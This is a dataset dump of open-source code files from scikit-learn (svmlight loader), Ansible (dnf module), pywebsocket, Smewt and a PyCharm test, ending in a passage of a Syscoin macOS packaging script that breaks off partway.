repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
JetBrains/intellij-community
|
refs/heads/master
|
python/testData/intentions/PyConvertTypeCommentToVariableAnnotationIntentionTest/assignmentWithComplexUnpacking.py
|
31
|
[y, (x, (z))] = undefined() # ty<caret>pe: Optional[Union[None, Any]], (Callable[..., int], Any)
|
yunfeilu/scikit-learn
|
refs/heads/master
|
sklearn/datasets/svmlight_format.py
|
79
|
"""This module implements a loader and dumper for the svmlight format
This format is a text-based format, with one sample per line. It does
not store zero valued features hence is suitable for sparse dataset.
The first element of each line can be used to store a target variable to
predict.
This format is used as the default format for both svmlight and the
libsvm command line programs.
"""
# Authors: Mathieu Blondel <mathieu@mblondel.org>
# Lars Buitinck <L.J.Buitinck@uva.nl>
# Olivier Grisel <olivier.grisel@ensta.org>
# License: BSD 3 clause
from contextlib import closing
import io
import os.path
import numpy as np
import scipy.sparse as sp
from ._svmlight_format import _load_svmlight_file
from .. import __version__
from ..externals import six
from ..externals.six import u, b
from ..externals.six.moves import range, zip
from ..utils import check_array
from ..utils.fixes import frombuffer_empty
def load_svmlight_file(f, n_features=None, dtype=np.float64,
multilabel=False, zero_based="auto", query_id=False):
"""Load datasets in the svmlight / libsvm format into sparse CSR matrix
This format is a text-based format, with one sample per line. It does
not store zero valued features hence is suitable for sparse dataset.
The first element of each line can be used to store a target variable
to predict.
This format is used as the default format for both svmlight and the
libsvm command line programs.
Parsing a text based source can be expensive. When working on
repeatedly on the same dataset, it is recommended to wrap this
loader with joblib.Memory.cache to store a memmapped backup of the
CSR results of the first call and benefit from the near instantaneous
loading of memmapped structures for the subsequent calls.
In case the file contains a pairwise preference constraint (known
as "qid" in the svmlight format) these are ignored unless the
query_id parameter is set to True. These pairwise preference
constraints can be used to constraint the combination of samples
when using pairwise loss functions (as is the case in some
learning to rank problems) so that only pairs with the same
query_id value are considered.
This implementation is written in Cython and is reasonably fast.
However, a faster API-compatible loader is also available at:
https://github.com/mblondel/svmlight-loader
Parameters
----------
f : {str, file-like, int}
(Path to) a file to load. If a path ends in ".gz" or ".bz2", it will
be uncompressed on the fly. If an integer is passed, it is assumed to
be a file descriptor. A file-like or file descriptor will not be closed
by this function. A file-like object must be opened in binary mode.
n_features : int or None
The number of features to use. If None, it will be inferred. This
argument is useful to load several files that are subsets of a
bigger sliced dataset: each subset might not have examples of
every feature, hence the inferred shape might vary from one
slice to another.
multilabel : boolean, optional, default False
Samples may have several labels each (see
http://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/multilabel.html)
zero_based : boolean or "auto", optional, default "auto"
Whether column indices in f are zero-based (True) or one-based
(False). If column indices are one-based, they are transformed to
zero-based to match Python/NumPy conventions.
If set to "auto", a heuristic check is applied to determine this from
the file contents. Both kinds of files occur "in the wild", but they
are unfortunately not self-identifying. Using "auto" or True should
always be safe.
query_id : boolean, default False
If True, will return the query_id array for each file.
dtype : numpy data type, default np.float64
Data type of dataset to be loaded. This will be the data type of the
output numpy arrays ``X`` and ``y``.
Returns
-------
X: scipy.sparse matrix of shape (n_samples, n_features)
y: ndarray of shape (n_samples,), or, in the multilabel a list of
tuples of length n_samples.
query_id: array of shape (n_samples,)
query_id for each sample. Only returned when query_id is set to
True.
See also
--------
load_svmlight_files: similar function for loading multiple files in this
format, enforcing the same number of features/columns on all of them.
Examples
--------
To use joblib.Memory to cache the svmlight file::
from sklearn.externals.joblib import Memory
from sklearn.datasets import load_svmlight_file
mem = Memory("./mycache")
@mem.cache
def get_data():
data = load_svmlight_file("mysvmlightfile")
return data[0], data[1]
X, y = get_data()
"""
return tuple(load_svmlight_files([f], n_features, dtype, multilabel,
zero_based, query_id))
def _gen_open(f):
if isinstance(f, int): # file descriptor
return io.open(f, "rb", closefd=False)
elif not isinstance(f, six.string_types):
raise TypeError("expected {str, int, file-like}, got %s" % type(f))
_, ext = os.path.splitext(f)
if ext == ".gz":
import gzip
return gzip.open(f, "rb")
elif ext == ".bz2":
from bz2 import BZ2File
return BZ2File(f, "rb")
else:
return open(f, "rb")
def _open_and_load(f, dtype, multilabel, zero_based, query_id):
if hasattr(f, "read"):
actual_dtype, data, ind, indptr, labels, query = \
_load_svmlight_file(f, dtype, multilabel, zero_based, query_id)
# XXX remove closing when Python 2.7+/3.1+ required
else:
with closing(_gen_open(f)) as f:
actual_dtype, data, ind, indptr, labels, query = \
_load_svmlight_file(f, dtype, multilabel, zero_based, query_id)
# convert from array.array, give data the right dtype
if not multilabel:
labels = frombuffer_empty(labels, np.float64)
data = frombuffer_empty(data, actual_dtype)
indices = frombuffer_empty(ind, np.intc)
indptr = np.frombuffer(indptr, dtype=np.intc) # never empty
query = frombuffer_empty(query, np.intc)
data = np.asarray(data, dtype=dtype) # no-op for float{32,64}
return data, indices, indptr, labels, query
def load_svmlight_files(files, n_features=None, dtype=np.float64,
multilabel=False, zero_based="auto", query_id=False):
"""Load dataset from multiple files in SVMlight format
This function is equivalent to mapping load_svmlight_file over a list of
files, except that the results are concatenated into a single, flat list
and the samples vectors are constrained to all have the same number of
features.
In case the file contains a pairwise preference constraint (known
as "qid" in the svmlight format) these are ignored unless the
query_id parameter is set to True. These pairwise preference
constraints can be used to constraint the combination of samples
when using pairwise loss functions (as is the case in some
learning to rank problems) so that only pairs with the same
query_id value are considered.
Parameters
----------
files : iterable over {str, file-like, int}
(Paths of) files to load. If a path ends in ".gz" or ".bz2", it will
be uncompressed on the fly. If an integer is passed, it is assumed to
be a file descriptor. File-likes and file descriptors will not be
closed by this function. File-like objects must be opened in binary
mode.
n_features: int or None
The number of features to use. If None, it will be inferred from the
maximum column index occurring in any of the files.
This can be set to a higher value than the actual number of features
in any of the input files, but setting it to a lower value will cause
an exception to be raised.
multilabel: boolean, optional
Samples may have several labels each (see
http://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/multilabel.html)
zero_based: boolean or "auto", optional
Whether column indices in f are zero-based (True) or one-based
(False). If column indices are one-based, they are transformed to
zero-based to match Python/NumPy conventions.
If set to "auto", a heuristic check is applied to determine this from
the file contents. Both kinds of files occur "in the wild", but they
are unfortunately not self-identifying. Using "auto" or True should
always be safe.
query_id: boolean, defaults to False
If True, will return the query_id array for each file.
dtype : numpy data type, default np.float64
Data type of dataset to be loaded. This will be the data type of the
output numpy arrays ``X`` and ``y``.
Returns
-------
[X1, y1, ..., Xn, yn]
where each (Xi, yi) pair is the result from load_svmlight_file(files[i]).
If query_id is set to True, this will return instead [X1, y1, q1,
..., Xn, yn, qn] where (Xi, yi, qi) is the result from
load_svmlight_file(files[i])
Notes
-----
When fitting a model to a matrix X_train and evaluating it against a
matrix X_test, it is essential that X_train and X_test have the same
number of features (X_train.shape[1] == X_test.shape[1]). This may not
be the case if you load the files individually with load_svmlight_file.
See also
--------
load_svmlight_file
"""
r = [_open_and_load(f, dtype, multilabel, bool(zero_based), bool(query_id))
for f in files]
if (zero_based is False
or zero_based == "auto" and all(np.min(tmp[1]) > 0 for tmp in r)):
for ind in r:
indices = ind[1]
indices -= 1
n_f = max(ind[1].max() for ind in r) + 1
if n_features is None:
n_features = n_f
elif n_features < n_f:
raise ValueError("n_features was set to {},"
" but input file contains {} features"
.format(n_features, n_f))
result = []
for data, indices, indptr, y, query_values in r:
shape = (indptr.shape[0] - 1, n_features)
X = sp.csr_matrix((data, indices, indptr), shape)
X.sort_indices()
result += X, y
if query_id:
result.append(query_values)
return result
def _dump_svmlight(X, y, f, multilabel, one_based, comment, query_id):
is_sp = int(hasattr(X, "tocsr"))
if X.dtype.kind == 'i':
value_pattern = u("%d:%d")
else:
value_pattern = u("%d:%.16g")
if y.dtype.kind == 'i':
label_pattern = u("%d")
else:
label_pattern = u("%.16g")
line_pattern = u("%s")
if query_id is not None:
line_pattern += u(" qid:%d")
line_pattern += u(" %s\n")
if comment:
f.write(b("# Generated by dump_svmlight_file from scikit-learn %s\n"
% __version__))
f.write(b("# Column indices are %s-based\n"
% ["zero", "one"][one_based]))
f.write(b("#\n"))
f.writelines(b("# %s\n" % line) for line in comment.splitlines())
for i in range(X.shape[0]):
if is_sp:
span = slice(X.indptr[i], X.indptr[i + 1])
row = zip(X.indices[span], X.data[span])
else:
nz = X[i] != 0
row = zip(np.where(nz)[0], X[i, nz])
s = " ".join(value_pattern % (j + one_based, x) for j, x in row)
if multilabel:
nz_labels = np.where(y[i] != 0)[0]
labels_str = ",".join(label_pattern % j for j in nz_labels)
else:
labels_str = label_pattern % y[i]
if query_id is not None:
feat = (labels_str, query_id[i], s)
else:
feat = (labels_str, s)
f.write((line_pattern % feat).encode('ascii'))
def dump_svmlight_file(X, y, f, zero_based=True, comment=None, query_id=None,
multilabel=False):
"""Dump the dataset in svmlight / libsvm file format.
This format is a text-based format, with one sample per line. It does
not store zero valued features hence is suitable for sparse dataset.
The first element of each line can be used to store a target variable
to predict.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_labels]
Target values. Class labels must be an integer or float, or array-like
objects of integer or float for multilabel classifications.
f : string or file-like in binary mode
If string, specifies the path that will contain the data.
If file-like, data will be written to f. f should be opened in binary
mode.
zero_based : boolean, optional
Whether column indices should be written zero-based (True) or one-based
(False).
comment : string, optional
Comment to insert at the top of the file. This should be either a
Unicode string, which will be encoded as UTF-8, or an ASCII byte
string.
If a comment is given, then it will be preceded by one that identifies
the file as having been dumped by scikit-learn. Note that not all
tools grok comments in SVMlight files.
query_id : array-like, shape = [n_samples]
Array containing pairwise preference constraints (qid in svmlight
format).
multilabel: boolean, optional
Samples may have several labels each (see
http://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/multilabel.html)
"""
if comment is not None:
# Convert comment string to list of lines in UTF-8.
# If a byte string is passed, then check whether it's ASCII;
# if a user wants to get fancy, they'll have to decode themselves.
# Avoid mention of str and unicode types for Python 3.x compat.
if isinstance(comment, bytes):
comment.decode("ascii") # just for the exception
else:
comment = comment.encode("utf-8")
if six.b("\0") in comment:
raise ValueError("comment string contains NUL byte")
y = np.asarray(y)
if y.ndim != 1 and not multilabel:
raise ValueError("expected y of shape (n_samples,), got %r"
% (y.shape,))
Xval = check_array(X, accept_sparse='csr')
if Xval.shape[0] != y.shape[0]:
raise ValueError("X.shape[0] and y.shape[0] should be the same, got"
" %r and %r instead." % (Xval.shape[0], y.shape[0]))
# We had some issues with CSR matrices with unsorted indices (e.g. #1501),
# so sort them here, but first make sure we don't modify the user's X.
# TODO We can do this cheaper; sorted_indices copies the whole matrix.
if Xval is X and hasattr(Xval, "sorted_indices"):
X = Xval.sorted_indices()
else:
X = Xval
if hasattr(X, "sort_indices"):
X.sort_indices()
if query_id is not None:
query_id = np.asarray(query_id)
if query_id.shape[0] != y.shape[0]:
raise ValueError("expected query_id of shape (n_samples,), got %r"
% (query_id.shape,))
one_based = not zero_based
if hasattr(f, "write"):
_dump_svmlight(X, y, f, multilabel, one_based, comment, query_id)
else:
with open(f, "wb") as f:
_dump_svmlight(X, y, f, multilabel, one_based, comment, query_id)
|
tjanez/ansible
|
refs/heads/devel
|
lib/ansible/modules/packaging/os/dnf.py
|
25
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2015 Cristian van Ee <cristian at cvee.org>
# Copyright 2015 Igor Gnatenko <i.gnatenko.brain@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'core',
'version': '1.0'}
DOCUMENTATION = '''
---
module: dnf
version_added: 1.9
short_description: Manages packages with the I(dnf) package manager
description:
- Installs, upgrade, removes, and lists packages and groups with the I(dnf) package manager.
options:
name:
description:
- "Package name, or package specifier with version, like C(name-1.0). When using state=latest, this can be '*' which means run: dnf -y update. You can also pass a url or a local path to a rpm file."
required: true
default: null
aliases: []
list:
description:
- Various (non-idempotent) commands for usage with C(/usr/bin/ansible) and I(not) playbooks. See examples.
required: false
default: null
state:
description:
- Whether to install (C(present), C(latest)), or remove (C(absent)) a package.
required: false
choices: [ "present", "latest", "absent" ]
default: "present"
enablerepo:
description:
- I(Repoid) of repositories to enable for the install/update operation.
These repos will not persist beyond the transaction.
When specifying multiple repos, separate them with a ",".
required: false
default: null
aliases: []
disablerepo:
description:
- I(Repoid) of repositories to disable for the install/update operation.
These repos will not persist beyond the transaction.
When specifying multiple repos, separate them with a ",".
required: false
default: null
aliases: []
conf_file:
description:
- The remote dnf configuration file to use for the transaction.
required: false
default: null
aliases: []
disable_gpg_check:
description:
- Whether to disable the GPG checking of signatures of packages being
installed. Has an effect only if state is I(present) or I(latest).
required: false
default: "no"
choices: ["yes", "no"]
aliases: []
installroot:
description:
- Specifies an alternative installroot, relative to which all packages
will be installed.
required: false
version_added: "2.3"
default: "/"
notes: []
# informational: requirements for nodes
requirements:
- "python >= 2.6"
- python-dnf
author:
- '"Igor Gnatenko (@ignatenkobrain)" <i.gnatenko.brain@gmail.com>'
- '"Cristian van Ee (@DJMuggs)" <cristian at cvee.org>'
- "Berend De Schouwer (github.com/berenddeschouwer)"
'''
EXAMPLES = '''
- name: install the latest version of Apache
dnf:
name: httpd
state: latest
- name: remove the Apache package
dnf:
name: httpd
state: absent
- name: install the latest version of Apache from the testing repo
dnf:
name: httpd
enablerepo: testing
state: present
- name: upgrade all packages
dnf:
name: "*"
state: latest
- name: install the nginx rpm from a remote repo
dnf:
name: 'http://nginx.org/packages/centos/6/noarch/RPMS/nginx-release-centos-6-0.el6.ngx.noarch.rpm'
state: present
- name: install nginx rpm from a local file
dnf:
name: /usr/local/src/nginx-release-centos-6-0.el6.ngx.noarch.rpm
state: present
- name: install the 'Development tools' package group
dnf:
name: '@Development tools'
state: present
'''
import os
try:
import dnf
import dnf
import dnf.cli
import dnf.const
import dnf.exceptions
import dnf.subject
import dnf.util
HAS_DNF = True
except ImportError:
HAS_DNF = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import PY2
def _ensure_dnf(module):
if not HAS_DNF:
if PY2:
package = 'python2-dnf'
else:
package = 'python3-dnf'
if module.check_mode:
module.fail_json(msg="`{0}` is not installed, but it is required"
" for the Ansible dnf module.".format(package))
module.run_command(['dnf', 'install', '-y', package], check_rc=True)
global dnf
try:
import dnf
import dnf.cli
import dnf.const
import dnf.exceptions
import dnf.subject
import dnf.util
except ImportError:
module.fail_json(msg="Could not import the dnf python module."
" Please install `{0}` package.".format(package))
def _configure_base(module, base, conf_file, disable_gpg_check, installroot='/'):
"""Configure the dnf Base object."""
conf = base.conf
# Turn off debug messages in the output
conf.debuglevel = 0
# Set whether to check gpg signatures
conf.gpgcheck = not disable_gpg_check
# Don't prompt for user confirmations
conf.assumeyes = True
# Set installroot
conf.installroot = installroot
# Change the configuration file path if provided
if conf_file:
# Fail if we can't read the configuration file.
if not os.access(conf_file, os.R_OK):
module.fail_json(
msg="cannot read configuration file", conf_file=conf_file)
else:
conf.config_file_path = conf_file
# Read the configuration file
conf.read()
def _specify_repositories(base, disablerepo, enablerepo):
"""Enable and disable repositories matching the provided patterns."""
base.read_all_repos()
repos = base.repos
# Disable repositories
for repo_pattern in disablerepo:
for repo in repos.get_matching(repo_pattern):
repo.disable()
# Enable repositories
for repo_pattern in enablerepo:
for repo in repos.get_matching(repo_pattern):
repo.enable()
def _base(module, conf_file, disable_gpg_check, disablerepo, enablerepo, installroot):
"""Return a fully configured dnf Base object."""
base = dnf.Base()
_configure_base(module, base, conf_file, disable_gpg_check, installroot)
_specify_repositories(base, disablerepo, enablerepo)
base.fill_sack(load_system_repo='auto')
return base
def _package_dict(package):
"""Return a dictionary of information for the package."""
# NOTE: This no longer contains the 'dnfstate' field because it is
# already known based on the query type.
result = {
'name': package.name,
'arch': package.arch,
'epoch': str(package.epoch),
'release': package.release,
'version': package.version,
'repo': package.repoid}
result['nevra'] = '{epoch}:{name}-{version}-{release}.{arch}'.format(
**result)
return result
def list_items(module, base, command):
"""List package info based on the command."""
# Rename updates to upgrades
if command == 'updates':
command = 'upgrades'
# Return the corresponding packages
if command in ['installed', 'upgrades', 'available']:
results = [
_package_dict(package)
for package in getattr(base.sack.query(), command)()]
# Return the enabled repository ids
elif command in ['repos', 'repositories']:
results = [
{'repoid': repo.id, 'state': 'enabled'}
for repo in base.repos.iter_enabled()]
# Return any matching packages
else:
packages = dnf.subject.Subject(command).get_best_query(base.sack)
results = [_package_dict(package) for package in packages]
module.exit_json(results=results)
def _mark_package_install(module, base, pkg_spec):
"""Mark the package for install."""
try:
base.install(pkg_spec)
except dnf.exceptions.MarkingError:
module.fail_json(msg="No package {} available.".format(pkg_spec))
def _parse_spec_group_file(names):
pkg_specs, grp_specs, filenames = [], [], []
for name in names:
if name.endswith(".rpm"):
filenames.append(name)
elif name.startswith("@"):
grp_specs.append(name[1:])
else:
pkg_specs.append(name)
return pkg_specs, grp_specs, filenames
def _install_remote_rpms(base, filenames):
if int(dnf.__version__.split(".")[0]) >= 2:
pkgs = list(sorted(base.add_remote_rpms(list(filenames)), reverse=True))
else:
pkgs = []
for filename in filenames:
pkgs.append(base.add_remote_rpm(filename))
for pkg in pkgs:
base.package_install(pkg)
def ensure(module, base, state, names):
# Accumulate failures. Package management modules install what they can
# and fail with a message about what they can't.
failures = []
allow_erasing = False
if names == ['*'] and state == 'latest':
base.upgrade_all()
else:
pkg_specs, group_specs, filenames = _parse_spec_group_file(names)
if group_specs:
base.read_comps()
pkg_specs = [p.strip() for p in pkg_specs]
filenames = [f.strip() for f in filenames]
groups = []
environments = []
for group_spec in (g.strip() for g in group_specs):
group = base.comps.group_by_pattern(group_spec)
if group:
groups.append(group)
else:
environment = base.comps.environment_by_pattern(group_spec)
if environment:
environments.append(environment.id)
else:
module.fail_json(
msg="No group {} available.".format(group_spec))
if state in ['installed', 'present']:
# Install files.
_install_remote_rpms(base, filenames)
# Install groups.
for group in groups:
try:
base.group_install(group, dnf.const.GROUP_PACKAGE_TYPES)
except dnf.exceptions.Error as e:
# In dnf 2.0 if all the mandatory packages in a group do
# not install, an error is raised. We want to capture
# this but still install as much as possible.
failures.append((group, e))
for environment in environments:
try:
base.environment_install(environment, dnf.const.GROUP_PACKAGE_TYPES)
except dnf.exceptions.Error as e:
failures.append((group, e))
# Install packages.
for pkg_spec in pkg_specs:
_mark_package_install(module, base, pkg_spec)
elif state == 'latest':
# "latest" is same as "installed" for filenames.
_install_remote_rpms(base, filenames)
for group in groups:
try:
try:
base.group_upgrade(group)
except dnf.exceptions.CompsError:
# If not already installed, try to install.
base.group_install(group, dnf.const.GROUP_PACKAGE_TYPES)
except dnf.exceptions.Error as e:
failures.append((group, e))
for environment in environments:
try:
try:
base.environment_upgrade(environment)
except dnf.exceptions.CompsError:
# If not already installed, try to install.
base.environment_install(group, dnf.const.GROUP_PACKAGE_TYPES)
except dnf.exceptions.Error as e:
failures.append((group, e))
for pkg_spec in pkg_specs:
# best effort causes to install the latest package
# even if not previously installed
base.conf.best = True
base.install(pkg_spec)
else:
# state == absent
if filenames:
module.fail_json(
msg="Cannot remove paths -- please specify package name.")
for group in groups:
try:
base.group_remove(group)
except dnf.exceptions.CompsError:
# Group is already uninstalled.
pass
for envioronment in environments:
try:
base.environment_remove(environment)
except dnf.exceptions.CompsError:
# Environment is already uninstalled.
pass
installed = base.sack.query().installed()
for pkg_spec in pkg_specs:
if installed.filter(name=pkg_spec):
base.remove(pkg_spec)
# Like the dnf CLI we want to allow recursive removal of dependent
# packages
allow_erasing = True
if not base.resolve(allow_erasing=allow_erasing):
if failures:
module.fail_json(msg='Failed to install some of the specified packages',
failures=failures)
module.exit_json(msg="Nothing to do")
else:
if module.check_mode:
if failures:
module.fail_json(msg='Failed to install some of the specified packages',
failures=failures)
module.exit_json(changed=True)
base.download_packages(base.transaction.install_set)
base.do_transaction()
response = {'changed': True, 'results': []}
for package in base.transaction.install_set:
response['results'].append("Installed: {0}".format(package))
for package in base.transaction.remove_set:
response['results'].append("Removed: {0}".format(package))
if failures:
module.fail_json(msg='Failed to install some of the specified packages',
failures=failures)
module.exit_json(**response)
def main():
"""The main function."""
module = AnsibleModule(
argument_spec=dict(
name=dict(aliases=['pkg'], type='list'),
state=dict(
default='installed',
choices=[
'absent', 'present', 'installed', 'removed', 'latest']),
enablerepo=dict(type='list', default=[]),
disablerepo=dict(type='list', default=[]),
list=dict(),
conf_file=dict(default=None, type='path'),
disable_gpg_check=dict(default=False, type='bool'),
installroot=dict(default='/', type='path'),
),
required_one_of=[['name', 'list']],
mutually_exclusive=[['name', 'list']],
supports_check_mode=True)
params = module.params
_ensure_dnf(module)
if params['list']:
base = _base(
module, params['conf_file'], params['disable_gpg_check'],
params['disablerepo'], params['enablerepo'], params['installroot'])
list_items(module, base, params['list'])
else:
# Note: base takes a long time to run so we want to check for failure
# before running it.
if not dnf.util.am_i_root():
module.fail_json(msg="This command has to be run under the root user.")
base = _base(
module, params['conf_file'], params['disable_gpg_check'],
params['disablerepo'], params['enablerepo'], params['installroot'])
ensure(module, base, params['state'], params['name'])
if __name__ == '__main__':
main()
|
wackou/smewt
|
refs/heads/master
|
smewt/test/smewttest.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Smewt - A smart collection manager
# Copyright (c) 2008 Nicolas Wack <wackou@smewt.com>
#
# Smewt is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Smewt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from unittest import *
from unittest import TestCase as BaseTestCase
import yaml, logging, sys, os
from os.path import *
MAIN_LOGGING_LEVEL = logging.WARNING
from utils.slogging import setupLogging
setupLogging()
logging.getLogger().setLevel(MAIN_LOGGING_LEVEL)
# we most likely never want this to be on debug mode, as it spits out way too much information
if MAIN_LOGGING_LEVEL == logging.DEBUG:
logging.getLogger('pygoo').setLevel(logging.INFO)
def currentPath():
'''Returns the path in which the calling file is located.'''
return dirname(join(os.getcwd(), sys._getframe(1).f_globals['__file__']))
def addImportPath(path):
'''Function that adds the specified path to the import path. The path can be
absolute or relative to the calling file.'''
importPath = abspath(join(currentPath(), path))
sys.path = [ importPath ] + sys.path
addImportPath('.') # for the tests
addImportPath('../..') # for import smewt
import smewt
from smewt import *
from pygoo import *
from smewt.solvers import *
from smewt.guessers import *
from smewt.media import *
# before starting any tests, save smewt's default ontology in case we mess with it and need it again later
ontology.save_current_ontology('media')
from smewt.base import cache
cache.load('/tmp/smewt.cache')
def shutdown():
cache.save('/tmp/smewt.cache')
def allTests(testClass):
return TestLoader().loadTestsFromTestCase(testClass)
|
raviflipsyde/servo
|
refs/heads/master
|
tests/wpt/css-tests/tools/pywebsocket/src/mod_pywebsocket/_stream_base.py
|
652
|
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Base stream class.
"""
# Note: request.connection.write/read are used in this module, even though
# mod_python document says that they should be used only in connection
# handlers. Unfortunately, we have no other options. For example,
# request.write/read are not suitable because they don't allow direct raw bytes
# writing/reading.
import socket
from mod_pywebsocket import util
# Exceptions
class ConnectionTerminatedException(Exception):
"""This exception will be raised when a connection is terminated
unexpectedly.
"""
pass
class InvalidFrameException(ConnectionTerminatedException):
"""This exception will be raised when we received an invalid frame we
cannot parse.
"""
pass
class BadOperationException(Exception):
"""This exception will be raised when send_message() is called on
server-terminated connection or receive_message() is called on
client-terminated connection.
"""
pass
class UnsupportedFrameException(Exception):
"""This exception will be raised when we receive a frame with flag, opcode
we cannot handle. Handlers can just catch and ignore this exception and
call receive_message() again to continue processing the next frame.
"""
pass
class InvalidUTF8Exception(Exception):
"""This exception will be raised when we receive a text frame which
contains invalid UTF-8 strings.
"""
pass
class StreamBase(object):
"""Base stream class."""
def __init__(self, request):
"""Construct an instance.
Args:
request: mod_python request.
"""
self._logger = util.get_class_logger(self)
self._request = request
def _read(self, length):
"""Reads length bytes from connection. In case we catch any exception,
prepends remote address to the exception message and raise again.
Raises:
ConnectionTerminatedException: when read returns empty string.
"""
try:
read_bytes = self._request.connection.read(length)
if not read_bytes:
raise ConnectionTerminatedException(
'Receiving %d byte failed. Peer (%r) closed connection' %
(length, (self._request.connection.remote_addr,)))
return read_bytes
except socket.error, e:
# Catch a socket.error. Because it's not a child class of the
# IOError prior to Python 2.6, we cannot omit this except clause.
# Use %s rather than %r for the exception to use human friendly
# format.
raise ConnectionTerminatedException(
'Receiving %d byte failed. socket.error (%s) occurred' %
(length, e))
except IOError, e:
# Also catch an IOError because mod_python throws it.
raise ConnectionTerminatedException(
'Receiving %d byte failed. IOError (%s) occurred' %
(length, e))
def _write(self, bytes_to_write):
"""Writes given bytes to connection. In case we catch any exception,
prepends remote address to the exception message and raise again.
"""
try:
self._request.connection.write(bytes_to_write)
except Exception, e:
util.prepend_message_to_exception(
'Failed to send message to %r: ' %
(self._request.connection.remote_addr,),
e)
raise
def receive_bytes(self, length):
"""Receives multiple bytes. Retries read when we couldn't receive the
specified amount.
Raises:
ConnectionTerminatedException: when read returns empty string.
"""
read_bytes = []
while length > 0:
new_read_bytes = self._read(length)
read_bytes.append(new_read_bytes)
length -= len(new_read_bytes)
return ''.join(read_bytes)
def _read_until(self, delim_char):
"""Reads bytes until we encounter delim_char. The result will not
contain delim_char.
Raises:
ConnectionTerminatedException: when read returns empty string.
"""
read_bytes = []
while True:
ch = self._read(1)
if ch == delim_char:
break
read_bytes.append(ch)
return ''.join(read_bytes)
# vi:sts=4 sw=4 et
|
syscoin/syscoin2
|
refs/heads/master
|
contrib/macdeploy/custom_dsstore.py
|
1
|
#!/usr/bin/env python3
# Copyright (c) 2013-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import biplist
from ds_store import DSStore
from mac_alias import Alias
import sys
output_file = sys.argv[1]
package_name_ns = sys.argv[2]
ds = DSStore.open(output_file, 'w+')
ds['.']['bwsp'] = {
'ShowStatusBar': False,
'WindowBounds': '{{300, 280}, {500, 343}}',
'ContainerShowSidebar': False,
'SidebarWidth': 0,
'ShowTabView': False,
'PreviewPaneVisibility': False,
'ShowToolbar': False,
'ShowSidebar': False,
'ShowPathbar': True
}
icvp = {
'gridOffsetX': 0.0,
'textSize': 12.0,
'viewOptionsVersion': 1,
